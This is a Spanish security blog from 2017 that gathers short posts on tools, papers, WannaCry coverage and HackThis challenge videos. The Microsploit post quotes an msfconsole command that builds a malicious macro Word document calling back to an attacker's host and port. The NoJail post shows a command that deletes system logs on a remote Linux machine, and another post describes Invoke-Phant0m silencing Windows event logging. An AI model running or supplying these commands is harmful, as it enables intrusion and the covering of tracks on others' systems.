miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)

martes, 23 de mayo de 2017

Aprendiendo Bluetooth Hacker MODE :ON

Ayer en el metro, mientras escuchaba música, me puse a mirar a toda la gente que estaba embobada mirando su smartphone y pensé en cuantos de ellos tendrían el Bluetooth activado por defecto y en lo que podría hacer si supiera tanto como [Pablo F. Iglesias] pero como aun no, por algun lado tendré que empezar. 


Así que, cual ha sido me sorpresa al encontrarme con el Git Hub de [Brando Asuncion] donde le ha hecho ingeniería inversa al protocolo de la manera mas Hacker que se me ocurre. Brando se ha creado un script que emula ser un radar de dispositivos bluetooth, ha escuchado la salida con Wireshark y después ha recopilado toda la información sobre la petición y la respuesta en su repositorio.

Muy recomendable y bien explicado, ademas tenéis los script que ha usado para reproducir el experimento: 



Sed Buenos ;) 


lunes, 22 de mayo de 2017

MS17-010 Usado para minear Monero

Si os pensabais que a nadie mas se le había ocurrido usar Eternal Blue ibais muy equivocados. Proofpoint analizando WannaCry descubrieron una clase de Malware (llamado Adylkuzz) que usaba EternalBlue y DoublePulsar para instalar de manera masiva un minero de la criptomoneda Monero. Se calcula que ha tenido un alcance parecido al famoso Ransomware pero, como no da un mensaje de alerta pues no ha saltado a la luz pública.


Hoy os recomiendo el post de proofpoint donde explican como lo descubrieron y como lo destriparon. No os voy a explicar mucho mas ya que espero que os lo leáis.  Merece la pena: 

domingo, 21 de mayo de 2017

HackThis Javascript 3.- Devuelveme la pass

Domingo y hoy toca ver la solución al tercer reto de Javascript en HackThis. Javascript mola mil pero siempre y cuando hagamos las cosas bien. así que no dejemos las pass harcodeadas en el código ya que es muy fácil llamar con un alert() a la variable en la que está metida la pass. De esta manera Kazukun nos muestra como solucionar el tercer reto de Javascript en HackThis.

Sed Buenos ;)

viernes, 19 de mayo de 2017

Vídeo - La Brecha Digital - Cifra tu mundo

Viernes y hoy toca vídeo para desgrasar de tanta actualizad y de tanto Wannacry pero que nos permita estar alerta y de como reaccionar para blindarnos en la red de red. 
Tor, VPN, VoIP segura, Seguridad WiFi, Cifrado de Archivos para almacenar en la nube, uso de una raspberry pi para limpiar el unidades USB sospechosas, sistema operativo seguro Qubes OS y más.

Espero que os guste y que os sirva como a mi para interesaros un poco mas en este mundo.



Sed Buenos ;) 

jueves, 18 de mayo de 2017

Infografia.- El Balance de WannaCry

Bueno, después de casi una semana con la resaca del WannaCry me he preguntado cuanta gente a pagado o cuanto es el daño que ha causado. Así que ha sido una sorpresa que el ABC haya sacado una infografia donde hacen el recuento por nosotros.  No se bien bien de donde han sacado todos los datos pero en términos generales me sirve para hacerme una idea y creo que a vosotros también. 


Sed Buenos ;)

miércoles, 17 de mayo de 2017

Podcast.- Podcast Dame una Shell - 2

Dame una Shell, el podcast de nuestro amigo Snifer, se está convirtiendo en uno de mis podcast de referencia y no es para menos. Me encanta todo lo que salga de la cominudad y en esta edición de podcast Snifer la ha clavado. No solo le ha dado un buen repaso al Keylogger preinstalado de HP que ha sido totalmente tapado por el tema de WanaCry si no que también ha tratado el tema del Kill Switch (Ya sabies, el episodio del joven que localizo la dirección de descarga de WanaCry y la compro para par la primera versión) que a mi me tenia tan extrañado. 

Le ha salido un podcast redondo y me da envidia no poder participar. Envidia te tengo Dino! 


Muchas mas información, enlaces y fuente:



Sed Buenos ;) 

martes, 16 de mayo de 2017

Vídeo.- Python. Más rápido que C

No, aun no me queméis por hereje, se que el titulo puede llegar un poco a engaño y digo un poco por que Facundo Batista a trasteado un monto para compararlo con C hasta el punto de descubrir que optimizándolo de la forma correcta Python no es mucho mas lento que C y ganamos velocidad en escribirlo. 

Super-entretenido y curioso. Se tenéis curiosidad por ver como funcionan los lenguajes de programación por debajo os recomiendo que lo veáis. 


Sed Buenos ;) 

lunes, 15 de mayo de 2017

Stop using SMBv1

Por fin es Lunes y el estrés por el tema de Wanacry ha disminuido (al menos a mi alrededor) aunque lo estén repitiendo todo el día en las noticias. Yo por mi parte, ya que lo estaba viviendo, e intentado ver lo menos posible la información que desprendían los medios y centrarme en la comunidad, donde he podido encontrar aportaciones tan chulas como: [El GitHub de Wannacrypt0r-FACTSHEET] donde posiblemente esta toda la info que necesitas saber sobre este malware, [la entrada de hoy de fwhibbit] sobre este Malware como referencia a todos los que han escrito sobre este tema o [la entrada del Maligno  que el día después del ataque] se atrevió a explicar lo que paso con Telefónica y ademas como funcionaba el malware, es para darle un besico en el gorro.

Así que a mi solo me queda deciros lo siguiente, dejad de usar SMBv1, parchead y/o aplicad el siguiente Workaround en vuestras PowerShells:

  • set-smbserverconfiguration -EnableSMB1Protocol $false
Ah, y mostraros la siguientes viñetas que me han hecho mucha gracia: 


Sed Buenos 

domingo, 14 de mayo de 2017

HackThis Javascript 2.- Saber mates a veces va bien!

Después de un fin de semana raro entre el Ransomware y los cinco puntos en eurovisión cuando nos merecíamos los cero puntos, volvemos con los vídeos del Domingo.

Javascript es un lenguaje de programación que nos deja hacer un montón de cosas y entre ellas está la posibilidad de ayudarnos a realizar operaciones matemáticas. Pero que pasa si nos encontramos con un reto que usa Javascript para calcular que la pass es correcta.

Hoy, Kazukun, nos muestra como pasarnos el reto numero dos de Javascript jugando con las formulas. Esperamos que os guste.


Sed Buenos ;)

viernes, 12 de mayo de 2017

The Keylogger .- Conexant HD Audio Driver Package

Después de todo el el revuelo del [Ransomware de Telefónica] que ha llenado las redes sociales de revuelo y gozo, ha tapado uno de los problemas por parte de HP mas flagrantes de los últimos años. 


Resulta que han encontrado un "keylogger" llamado MicTray64.exe que se instala junto a los drivers Conexant HD Audio Driver y monitoriza las pulsaciones de tu teclado y las guarda en C:\Users\Public\MicTray.log.  Vamos, es genial y justo lo que quieres cuando te compras un portátil. Indignado me hallo.

Ordenadores afectados:
  • HP EliteBook 820 G3 Notebook PC 
  • HP EliteBook 828 G3 Notebook PC 
  • HP EliteBook 840 G3 Notebook PC 
  • HP EliteBook 848 G3 Notebook PC 
  • HP EliteBook 850 G3 Notebook PC 
  • HP ProBook 640 G2 Notebook PC 
  • HP ProBook 650 G2 Notebook PC 
  • HP ProBook 645 G2 Notebook PC 
  • HP ProBook 655 G2 Notebook PC 
  • HP ProBook 450 G3 Notebook PC 
  • HP ProBook 430 G3 Notebook PC 
  • HP ProBook 440 G3 Notebook PC 
  • HP ProBook 446 G3 Notebook PC 
  • HP ProBook 470 G3 Notebook PC 
  • HP ProBook 455 G3 Notebook PC 
  • HP EliteBook 725 G3 Notebook PC 
  • HP EliteBook 745 G3 Notebook PC 
  • HP EliteBook 755 G3 Notebook PC 
  • HP EliteBook 1030 G1 Notebook PC 
  • HP ZBook 15u G3 Mobile Workstation 
  • HP Elite x2 1012 G1 Tablet 
  • HP Elite x2 1012 G1 with Travel Keyboard 
  • HP Elite x2 1012 G1 Advanced Keyboard 
  • HP EliteBook Folio 1040 G3 Notebook PC 
  • HP ZBook 17 G3 Mobile Workstation 
  • HP ZBook 15 G3 Mobile Workstation 
  • HP ZBook Studio G3 Mobile Workstation 
  • HP EliteBook Folio G1 Notebook PC
Solución:
  • Borra los ejecutables MicTray y los archivos de log relacionados a este. 
Mucha mas información y fuente:

Sed Buenos ;)

jueves, 11 de mayo de 2017

INCIBE.- Glosario de términos de ciberseguridad

Muchas veces no nos damos cuenta pero si alguien nos cogiera por la calle hablando de nuestras cosas de "Hackers" seguro que no entendería la mitad de las palabras que decimos pues, lo mismo le pasa a tu Director y muchas veces has de ponerte en su piel y explicarle las cosas como se deben. 


INCIBE ya se ha adelantado a esto y ha preparado un glosario de términos para te puede ser muy útil si eres nuevo en este mundo o te quieres enterar de lo que hablan tus empleados.  

Link al Glosario de INCIBE: 

Bueno, aunque si emplean un lenguaje mas técnico, ni con el glosario te vas a salvar.

Sed Buenos ;)

miércoles, 10 de mayo de 2017

NoJail.- Borrando voy, borrando vengo.

Hoy me he encontrado de morros con el repositorio freedom fighting de Ivan Kwiatkowski  y no me he podido evitar curiosear en su interior. Este repositorio tiene tres scripts en Python destinados a ayudarte a borrar el posible rastro que puedas dejar pero el que mas me ha llamado la atención es NoJail. 


NoJail está destinado a buscar los posibles logs que puedan haber en determinadas rutas de un Linux remoto, borrarlos y verificar que han sido borrados. 

Rutas Linux a las que accede para borrar logs: 
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/btmp 
  • /var/log/lastlog
  • /var/**/*.log 
  • Cualquier otra ruta que le piquemos manualmente. 

También como podréis ver a continuación, tiene un uso muy simple:
  • ./nojail.py --user root --ip IP /etc/app/logs/access.log --check
Enlace al repositorio donde encontrareis muchas mas información:
Además casi no tiene dependencias y en Python eso siempre es un Win. 

Sed Buenos ;) 

Scanless.- Varios escaners Web en un comando.

Si nunca lo habéis buscado, existes muchas aplicaciones web que nos permiten hacer un escaneo de puertos a otra máquina con solo introducir la IP o el dominio de una máquina. Así que, sabiendo que con Python podemos hacer consultas a páginas web y parsear el resultado, Austin Jackson ha cogido esta idea y se ha montado una herramienta muy fácil de usar que nos permite escanear por cinco escaners de puertos distintos con solo un comando. Fácil, cómodo y si queremos podemos usar los 5 a la vez para una sola máquina. 



Escaners que utiliza:
  • yougetsignal
  • viewdns
  • hackertarget
  • ipfingerprints
  • pingeu
Usage:
  • scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]
Más información y enlace a la herramienta:

Sed Buenos ;) 

lunes, 8 de mayo de 2017

Wiki.- Ultimate Android Reference

Si hace unos días hablábamos de la [wiki asombrosa sobre Hacking] donde podríamos encontrar recursos, herramientas o papers referentes para diferentes técnicas de Hacking, hoy quiero recomendaros la  Ultimate Android Reference donde encontraremos un montón den información sobre Android. 


Como no, también está en GitHub pero me ha ha venido muy bien para calmar mi curiosidad sobre la persistencia de archivos en Android. Igual que con la anterior wiki aquí podremos encontrar de todo y parece que se actualiza constantemente así que, muy recomendable. 


Enlace al Git Hub:


Sed Buenos ;) 

domingo, 7 de mayo de 2017

HackThis Javascript 1.- Where is my code!

Bueno, hoy es domingo y ya sabéis lo que toca, después de pasar por "todos" los retos intermediate (Si todos por que el 5 no está disponible a día de hoy) Kazukun se mete de lleno con el primer reto de la serie Javascript, el cual tendrá que buscar el código que contiene la palabra para pasar al siguiente reto.

Esperamos que os guste:


Sed Buenos ;) 

viernes, 5 de mayo de 2017

Vídeo.- MalwareAnalysisForHedgehogs

Hoy no quiero recomendaros un vídeo solo, si no un canal de youtube como tal, [MalwareAnalysisForHedgehogs] suben cada semana un vídeo donde trastean con algún Malware y hacen su análisis o cada cuando les da hace un podcast hablando de lo que a ellos les interesa y dando información de por donde empezar a los novatos como yo. Muy recomendable. 

Aquí tenéis un ejemplo:


Sed Buenos ;) 

jueves, 4 de mayo de 2017

Infografía.- Como ser contratado como Pentester

Hace unos días tuvimos por aquí la genial noticia de que Kazukun fue llamado para una entrevista para trabajar en este mundo que nos encanta a todos y creo que esta infografía no solo le va ir bien a el si no que a todos los estudiantes de informática que os mola todo esto también. 

No solo os quedéis con la infografía hoy os recomiendo para entender cada uno de los puntos: 


Muchas mas información sobre cada uno de los puntos de la infografía y fuente: 


Sed Buenos ;) 

miércoles, 3 de mayo de 2017

PowerShell.- Invoke-Phant0m

Una herramienta mas para PowerShell que, si alguna vez soñamos en dejar una máquina sin rastro de que hemos estado allí, nos ayudará un montón a eliminar procesos y subprocesos relacionados con nuestra actividad para que no aparezcan en el registro de Windows. 

"Este script, camina en las pilas del subproceso Event Log Service (específicamente svchost.exe) e identifica los hilos del registro de sucesos para eliminar los subprocesos del Event Log Service, por lo tanto, el sistema no podrá recopilar registros y al mismo tiempo, el Event Log Service aparecerá en ejecución."
 Vídeo de como funciona este script:


 


Enlace a la herramienta:
 
Sed Buenos ;)

martes, 2 de mayo de 2017

Paper.- El mal uso de puertos en varias App.

Siempre se ha dicho que los smartphones son ordenadores de bolsillo. Así que, ¿nunca os habéis parado de pensar qué puertos abiertos tendrán estos dispositivos? pues Yunhan Jack Jia, Qi Alfred Chen, Yikai Lin, Chao Kong, Z. Morley Mao de la Universidad de Michigan, Si y descubrieron algo muy chulo. ¿Alguna vez habéis hecho un Nmap a un smartphone? Pues si lo hacéis descubriréis lo chulos que pueden ser estos dispositivos a ese nivel, pero la buena gente de la Universidad de Michigan han descubierto que muchas aplicaciones pueden dejar puertos abiertos. Por lo que ya os podéis pensar el estropicio que se puede hacer.

Enlace al paper: 

Vídeo muestra del "estropicio":


Sed Buenos ;) 

lunes, 1 de mayo de 2017

Wiki.- Awesome Hacking

Si hace un par de días hablábamos de [Awesome CVE] un repositorio de vulnerabilidades con sus respectivas PoC (Pruebas de concepto) hoy quiero recomendaros el repositorio Awesome Hacking una especie de Wiki en GitHub, donde hay un montón de información sobre hacking y sobre cualquier tecnología que queráis trastear. 


Muy completo, hay un arsenal para hacer pruebas de la seguridad de vuestra wifi, información para que "experimentéis"con vuestro auto y/o si no os apetece, siempre podéis animaros a solucionar una de las CTFs que hay en este repositorio. 

Enlace al GitHub:


Sed Buenos ;)



domingo, 30 de abril de 2017

Vídeo.- HackThis Intermediate 6 .- "SQL"ame esta

Después de dos semanas sin vídeo hoy volvemos con el reto numero 6 de HackThis.  No siempre podemos tirar de SQLmap y siempre está bien aprender como debemos "tunear" una consulta a una base de da SQL dependiendo del código fuente de la página. No es fácil pero tampoco difícil y hoy Kazukun nos muestra como pasar el reto 6 de HackThis adecuando dicha consulta. 

Ademas hemos mejorado la entrada de los vídeos así que espero que os gusten un poco mas:


Sed Buenos ;) 

viernes, 28 de abril de 2017

Infografía.- 10 + 1 consejos sobre seguridad

Es viernes y no tengo un vídeo preparado pero INCIBE ha sacado una nueva infografía dedicada a explicar 11 consejos fáciles de aplicar para mejorar la seguridad informática de tu empresa y he tenido que aprovecharlo.  Además son consejos de sentido común y muy fáciles de aplicar así que tomad nota. 



La infografía mas grande y mucha más información:
Sed Buenos ;)

jueves, 27 de abril de 2017

PoC.- Awesome CVE

Ayer me encontré de cara con la siguiente entrada de [CyberHades] en super-conocido blog [Segu·Info] donde se presentaba Awesome CVE PoC un repositorio de GitHUb donde describen unas 80 vulnerabilidades y nos ofrece una prueba de concepto para cada una de estas vulnerabilidades.  Ademas, están actualizadas al día así que yo no puedo pedir nada mas, es un gran sistema para aprender aprender a romper cosas y para saber que procedimiento ha utilizado la gente que programa estas PoCs o exploits para encontrar y explotar estas vulnerabilidades. 


Vulnerabilidades descritas en el repositorio:
  • CVE-2013-6632
  • CVE-2014-1705
  • CVE-2014-3176
  • CVE-2014-7927
  • CVE-2014-7928
  • CVE-2015-0235
  • CVE-2015-1233
  • CVE-2015-1242
  • CVE-2015-3306
  • CVE-2015-6764
  • CVE-2015-6771
  • CVE-2015-7450
  • CVE-2015-7545
  • CVE-2015-8584
  • CVE-2016-0728
  • CVE-2016-1646
  • CVE-2016-1653
  • CVE-2016-1665
  • CVE-2016-1669
  • CVE-2016-1677
  • CVE-2016-1688
  • CVE-2016-1857
  • CVE-2016-3386
  • CVE-2016-4622
  • CVE-2016-4734
  • CVE-2016-5129
  • CVE-2016-5172
  • CVE-2016-5198
  • CVE-2016-5200
  • CVE-2016-7189
  • CVE-2016-7190
  • CVE-2016-7194
  • CVE-2016-7200
  • CVE-2016-7201
  • CVE-2016-7202
  • CVE-2016-7203
  • CVE-2016-7240
  • CVE-2016-7241
  • CVE-2016-7286
  • CVE-2016-7287
  • CVE-2016-7288
  • CVE-2016-7547
  • CVE-2016-7552
  • CVE-2016-8413
  • CVE-2016-8477
  • CVE-2016-8584
  • CVE-2016-8585
  • CVE-2016-8586
  • CVE-2016-8587
  • CVE-2016-8588
  • CVE-2016-8589
  • CVE-2016-8590
  • CVE-2016-8591
  • CVE-2016-8592
  • CVE-2016-8593
  • CVE-2016-9651
  • CVE-2017-0070
  • CVE-2017-0071
  • CVE-2017-0199
  • CVE-2017-0392
  • CVE-2017-0521
  • CVE-2017-0531
  • CVE-2017-0576
  • CVE-2017-2416
  • CVE-2017-2446
  • CVE-2017-2447
  • CVE-2017-2464
  • CVE-2017-2636
  • CVE-2017-5638
  • CVE-2017-7280
  • CVE-2017-7293
Como veis, están bastante al día. Aquí enlace al repositorio de GitHub: 
Sed Buenos ;) 

miércoles, 26 de abril de 2017

rePy2exe.- Ingeniería inversa a Py2exe

Hace mucho os hable del modulo [Py2exe] para Python, el cual nos permitía crear un .exe desde un .py. Bueno, pues resulta que si eres capaz de ver que este archivo ha sido creado con Py2exe puedes "reversearlo" con rey2exe. Una herramienta de [4w4k3] que nos permite ver que demonios esta haciendo el archivo que queramos analizar. 

Es fácil de usar, solo es seguir el menú y decirle en que tipo de extensión ,py queremos que nos deje el código del archivo.


Aix, con lo bien que me lo pasaba yo con Py2exe ahora tendremos que buscar otra forma o hacer algún que otro experimento.  La verdad es que es una herramienta muy útil y que si os gusta Python aprenderéis mucho de como funciona el modulo Py2exe.

Enlace a la herramienta:
Sed Buenos ;)  

martes, 25 de abril de 2017

Infografía.- Ciberinducción al daño físico

La ciberinducción al daño es un termino que he descubierto hoy gracias al Centro Cibernético Policial de Colombia y la verdad es que esta muy ligada al juego [Ballena Azul] ... el cual tristemente no deja de estar en boca de todos últimamente. 

"El término del juego de la ballena azul se refiere a un asunto alegado en una red social rusa conectado con el aumento de suicidios de adolescentes. Se cree que el juego está relacionado con más de un centenar de casos de suicidio en el mundo, teniendo fotos de las heridas autoinfligidas compartidos en redes sociales, junto con hashtags. El término "ballena azul" se refiere al fenómeno de ballenas varadas, que se compara con el suicidio."

El [Centro Cibernético Policial de Colombia] nos ha preparado una infografía para que todos conozcamos las razones y todo lo que esta en nuestras manos para combatirlo, muy recomendable.



Sed Buenos ;)

lunes, 24 de abril de 2017

Vídeo.- Ingeniería inversa de un chip

Si la ingeniería inversa de software es un tema que no acabo de entender y que me cuesta un montón (a lo mejor necesitaría una clase practica ... para acabar de pillarlo), destripar un chip ya me explota la cabeza.Bueno,  soy capaz de entenderlo pero no podría duplicar el experimento. Aunque,  no por eso, no deja de picarme la curiosidad. 

Así que hoy os recomiendo el siguiente vídeo por si tenéis curiosidad de ver como se hace:


Todo lo que corresponde a vulnerabilidades de Hardware es un mundo apasionante y del que no se habla abiertamente pero hay gente muy buena trabajando para encontrarlas y  mejorar nuestra experiencia como consumidores.

Sed Buenos ;) 

domingo, 23 de abril de 2017

Libro.- Hackers, aprende a atacar y a defenderte

Hoy es Sant Jordi por aquí, así que por tradición toca recomendaros algún libro internaste y se me paro a me paro a pensar en un libro que ha marcado mi camino en este mundo es la primera edición de Hackers, aprende a atacar y a defenderte de la editorial Ra-Ma. Este  libro aun lo guardo como si fuera de oro, está lleno de apuntes a lápiz
y de puntos de libro.

Aquí tenéis el enlace a la primera edición: 
Muy recomendable paro si tenéis que hacer la compra yo optaría por su segunda edición donde se habla de herramientas mas nuevas y sigue manteniendo ese fino hilo entre la enseñanza teórica y la práctica que tanto nos gusta al "trastear" con la tecnología. 

Enlace a la segunda edición: 

Sed Buenos ;)

viernes, 21 de abril de 2017

El horror al actualizar el navegador de tu auto.

Pues hoy no esperaba hacer esta entrada y va a ser muy corta, así que agarraos lo que podáis que vamos.

Me acabo de encontrar con el siguiente tweet de Guido van Rossum el creador de Python donde mostraba un video de honda e indicaba que el horror llegaba en el minuto 1:35 y la verdad es que no es para menos ...
El vídeo está oculto en vimeo, [se podrían hacer muchas cosas] pero voy a respetarlo un poco aunque aquí tenéis el enlace:
Entre nosotros, no creo que esta sea la mejor manera de actualizar un coche/auto. A mi se me ocurren 3 vectores de ataque ¿Cuantos se os ocurren a vosotros?

Estoy bastante indignado Honda tiene el suficiente capital como para hacer las cosas bien y poder para contratar a ingenieros capaces de adelantarse a estos problemas. La verdad es que me parece una solución del medievo para un error que puede traer muchos problemas.

Sed Buenos ;)

jueves, 20 de abril de 2017

Vídeo.- Algunos Tips fáciles para estar "seguro"

La verdad es que muchas veces mi nivel de paranoia se ha salido de escala y lo hasta lo he dejado patente en este blog.  Pero la verdad es que si seguimos algunos tips sencillos podemos mejorar nuestra seguridad. Así que hoy os recomiendo el siguiente vídeo de japonton donde nos explica unos tips muy interesantes y creo que merece la pena verlos si no estáis muy metidos en este mundo. Yo cambiaría algunos pero en general merece mucho la pena.



Sed Buenos ;) 

miércoles, 19 de abril de 2017

Como crear tu propio sistema operativo en C/C++

Otra entrada o nota para mi yo de futuro cuando se digne a aprender, de verdad, C o C++ y aunque solo [es la segunda entrada] ya podéis ver por donde van los tiros solo con leer el titulo. No, no aspiro a programar el mejor sistema operativo del universo, solo quiero entender el trabajo que ha detrás de lo que diariamente menospreciamos. Vamos saciar un poco mas mi curiosidad ¿No os parece interesante saber que está corriendo por debajo de vuestra interfaz gráfica? Pues a mi si. 


Así que como nota, hoy quiero recomendaros el libro How to Make a Computer Operating System de Samy Pessé una guía casi paso a paso de como crear un sistema operativo basado en C++ con ejemplos fotos y todo tipo de explicaciones. 

Enlace al libro:


Enlace al GitHub de Samy Pessé:

martes, 18 de abril de 2017

TeamSpy.- Los malos también confían en TeamViewer

Hoy me ha hecho mucha gracia toparme con este malware y no es por que sea una maravilla técnica, que en parte lo es, si no por que utiliza herramientas que todos tenemos muy a mano y que mal utilizadas puede permitir a un atacante tomar el control del equipo de la victima.


A todos nos suena TeamViewer ya, pero para los que seáis mas nuevos en un programa que nos permite tomar el control de un equipo con el consentimiento del receptor. Pues TeamSpy infecta el equipo de la victima engañando a la gente para descargar un archivo adjunto malicioso y pide al usuario que habilite las macros. Después de eso, el malware secretamente instala TeamViewer, dando a los cibercriminales el control total del ordenador infectado.

Como os he dicho, este malware utiliza programas que todos tenemos a nuestro alcance pero, ¿Cómo consigue que la victima no vea que se está instalando el TeamViewer? ¿Cómo sabe el pin que es necesario para realizar dicha conexión?

Para todo eso os recomiendo leer la siguiente entrada del blog de Avast donde lo destripan por completo:



Sed Buenos ;) 

lunes, 17 de abril de 2017

Mole Ransomware y la vuelta al blog.

Después de unos días de vacaciones en los que me han repasado el lomo a base de bien pero me lo he pasado como un chaval, volvemos al blog y como no, con uno de los malwares de moda de este año.  Os hablo del temido Ransomware y mas concretamente de Mole. 

Mole Ransomware es uno de esos malware que llegan por correo electrónico haciéndose pasar por una empresa de mensajería que no ha podido entregarte un paquete. Al abrir este correo y pinchar en el link de mas información. Nos encontramos con un documento en "Word Online" el cual nos pedirá un plugin para poder verlo y si nos descargamos y le damos doble clic al plugin acabaremos infectados por Mole Ransomware cifrando así todos nuestros archivos. 

Mas información y solución a este: 
También y si disponéis de un poco mas de tiempo, aquí tenéis un vídeo donde se destripa este malware en 15 minutos. Así podremos entenderlo del todo y como prevenirnos de el mirando las cabeceras HTTP de los correos que nos llegan. 


Sed Buenos ;)

jueves, 13 de abril de 2017

Paper.- Extracción del PIN mediante los sensores de movimiento de tu Smartphone

Ya ni inclinar el teléfono podemos ya que Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao de la School of Computing Science de la Universidad de Newcastle. Descubrieron en Mayo 2016 que, una vez un usuario visita un sitio web controlado por un atacante, el código incrustado en dicha página comienza a escuchar el movimiento y la información de los sensores de orientación sin necesidad de ningún permiso por parte del usuario. Después se analiza toda eta información y se obtiene el PIN del usuario.


Si tenes curiosidad por como lo han descubierto hoy os recomiendo el siguiente Paper: 

miércoles, 12 de abril de 2017

Inforgrafia.- Robo de contraseñas y como "impedirlo"

Hoy haciendo una búsqueda a infografias antiguas que tenía pendientes de publicar he dado con la página del National Cyber Security Center en la que hay mucha información como por ejemplo la infografia que quiero compartiros sobre que hacer si nos han conseguido pillar una contraseña. 


La verdad es que no es un mal poster para tener en la oficina. No obstante, para mucha mas información y una explicación mas detallada sobre este tema:

martes, 11 de abril de 2017

Palabra de Hacker.- ¿Qué es blockchain?

Estoy ultimando los planes para mi viaje del viernes y queriendo distraerme un poco de todas las cosas que tengo pendiente, me he puesto a escuchar el último programa de Palabra de Hacker que ya junto a Mundo Hacker se ha convertido en un contenido interesante para seguir de forma  periódica. Además hablan sobre Blockchain y ya sabéis que esta tecnología tira fuerte por aquí. 

Muy recomendable, casos reales y una explicación genial sobre todo este mundo: 


Sed Buenos ;) 

lunes, 10 de abril de 2017

Hashea como puedas pero hazlo bien.

Yo no se casi nada sobre funciones de hash, de como se han de programar o de por qué no debemos crear nuestro propio sistema de cifrado. Pero últimamente, con el tema de las colisiones en SHA1, estoy bastante interesado así que, me he buscado un poco la vida, y he ido a parar con la siguiente guía que nos responde a muchas dudas. Sobre todo a mi que soy un novato en esto.


En serio, es buena y empieza desde cero, casi mostrándonos el workflow que hará un usuario al conectarse y los pasos que hará el hash:
  1. El usuario crea una cuenta.
  2. Su contraseña es hasheada y se almacena en la base de datos. En ningún momento la contraseña estará en texto plano (sin cifrar).
  3. Cuando el usuario intenta iniciar sesión, se genera un hash para la contraseña cuando que se indico en el login y se compara con el hash de la contraseña real (recuperado de la base de datos).
  4. Si los hashes coinciden, se le concede acceso al usuario. Si no es así, se le dice al usuario que las credenciales de inicio de sesión no válidas.
  5. Los pasos 3 y 4 se repiten cada vez que alguien intenta acceder a su cuenta.
Después ya entra en buenas practicas y en como se deben solventar ciertos ataques a un nivel mucho mas técnico. Esta guía merece toda mi atención:

domingo, 9 de abril de 2017

HackThis Intermediate 4.- "Tuneando" un XSS

Domingo y día de vídeo son palabras que ya os deberían ir sonando, así que aquí tenéis una nueva solución de HackThis.

En la época en la que estamos, no todas las empresas han tenido el dinero para poder dedicar a la seguridad informática como les gustaría y es posible que hayan tenido que tirar con lo puesto detectando y corrigiendo todo lo posible.

No obstante a veces si no filtras bien ciertos caracteres  podemos manipular un XSS para que no sea parado por el filtre de caracteres y hoy Kazukun nos muestra un ejemplo muy sencillo.


Sed Buenos ;) 

viernes, 7 de abril de 2017

El 14, 15 y 16 de Abril no habrá entrada.

Poco a poco me vais conociendo un poco mas pero pocos me conocéis desde antes de que empezara mis andanzas por el mundo de la seguridad informática. Bueno,  hace ya 4 años, mas o menos, yo era uno de esos chicos al que le encantaban los videojuego e iba a torneos de Street Fighter, a quedadas con gente que jugaba a juegos de lucha y participaba en la comunidad.

Si os sorprenderá que haya una comunidad de gente que queda para jugar a lo que quieren, pero la verdad es que no es tan raro como participar en un CONes de seguridad informática donde hay Hackers que muestran lo que saben.  Hasta teníamos nuestro propio equipo que se llamaba BlueTeam (yo ya apuntaba maneras xD) antes que se pusiera de moda y empezaran a darlo por Moviestar+ 


Así que, después de 4 años sin ir a ningún torneo y necesitando ya unas pequeñas vacaciones, no me he podido resistir a la invitación de un amigo de toda la vida para irme unos días a disfrutar de algo que siempre me ha gustado mucho. 

Por eso los días 14, 15 y 16 de abril no habrá entrada en este blog a no se que haya algo reseñable durante en mi viaje e estrenemos la sección Hacking on the road que llevo tiempo con ella en la mente. 

Sed Buenos y estas avisados.  ;)

jueves, 6 de abril de 2017

Como crear tu propio editor de texto en C

Esto mas que una entrada sobre seguridad informática es la catalogan de un recurso para un proyecto a muy largo plazo, en el cual mi yo del futuro querrá meterse y tendrá que estar preparado para ello. Ademas, encaja muy bien con el espíritu Hacker de querer aprender como funciona todo.


Todo indica que me va a tocar aprender mucho C para mi proyecto, pero valdrá la pena y si cuento con guías como la que os voy a recomendar hoy va ha ser un muy buen tutorial. 

Salvatore Sanfilippo creo un [editor de texto llamado Kilo] con solo 1000 lineas de código en C, muy chulo y minimista en mi opinión,  y en esta guía encontraremos como programarlo nosotros desde 0 con C y a "tunearlo" a nuestro gusto. Muy chula para todos aquellos que como yo no tenga ni idea de C y quieran aprender con un ejemplo practico, realista y que vais a poder usar cuando queráis. 

Enlace a la guía:



Sed Buenos ;)

miércoles, 5 de abril de 2017

Paper,- Data Remanence in Flash Memory Devices

Hace unos días tuve un problema con un SSD el cual no fui capaz de hacer que el equipo lo montara ... así que busqué información pero no logre poder hacer nada y algo me da, que la solución al final pasaba por saber mas sobre electrónica. De esta manera ahora cada información que veo relacionada con este tema es motivo de análisis por mi parte.

Hoy me he encontrado con el siguiente vídeo, la verdad es que no deja de ser un "spot" publicitario pero quiero jugar con esto un día a ver si me funciona.


Ademas, me he acordado de una ponencia de la Blackhat donde se hablaba que no solo se podía recuperar información de los discos y la RAM sino que también ciertos componentes electrónicos también guardaban información jugosa que podíamos extraer en caso de necesidad y buscando mas información, hoy os voy a recomendar un paper que me ha parecido muy interesante, es un como electrónico pero trata sobre la información que aun puede almacenar los transistores que tenemos en nuestros equipos ya que durante el proceso de borrado los no todos los transistores vuelven a su estado inicia. Es un tema muy pero que muy curioso. 

Enlace al paper: 

Sed Buenos ;) 


martes, 4 de abril de 2017

PowerMemory y las credenciales en archivos y memoria

Cada día me sorprende mas lo polivalente que puede llegar a ser PowerShell y me doy cuenta de lo poco que sé de esta super-consola. Hoy, os voy a recomendar PowerMemor. Un "script", aun que llamarle así es quedarse un poco cojo, que nos permite buscar credenciales e información jugosa en los archivos y en la memoria del sistema. 


